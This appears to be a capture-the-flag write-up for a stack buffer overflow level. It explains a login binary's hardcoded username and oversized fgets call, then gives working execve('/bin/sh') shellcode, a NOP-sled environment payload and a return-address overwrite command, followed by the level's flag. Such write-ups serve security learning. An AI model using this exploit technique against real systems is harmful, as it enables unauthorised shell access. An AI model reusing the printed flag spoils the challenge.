### Explanations
This binary is a program asking you to log in with a __username/password combination__.

Upon disassembly, we can see in the _verify_user_name()_ function that the only valid username is hardcoded. The expected string is "__dat_will__".
We also see that, no matter which password we provide, it won't work. We will have to find a way around that issue.

We see in the _main()_ function that the password is stored in an array of __16 characters__. But there is an issue with how the user input is retreived: __the length argument for fgets() is 100__. Taking this into account, we can overflow that buffer and take control over the execution flow, eventually __returning into a shellcode__ stored in the environment.

The last thing we need to know, is how many bytes we have to write in this buffer before we reach the main's return address. To get that information, we can start the program inside gdb, create a breakpoint before the ret instruction of the main, __create a unique pattern of 100 characters__ or more and send it as our "password". After hitting our breakpoint, we can check the value stored in ESP and find it's offset in our pattern.
By doing so, we now know that we have to __write 80 bytes__ before reaching the main function's return address.

We now create our environnement variable.
```
$ export PAYLOAD=$(python -c 'print "\x90"*200 + "\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"')
```

We can find the address of our variable using the following command, after hitting a breakpoint in gdb:
```
gdb> x/40s *((char **)environ)
```

Then we just have to create our payload and pipe it into the binary's stdin:
```
$ python -c 'print "dat_wil" + "\n" + "A" * 80 + "\xd4\xde\xff\xff" + "\n"' > /tmp/payload
cat /tmp/payload - | ./level01
```
And we have our shell!
We can then retrieve the flag as usual.

### Flag
`PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv`
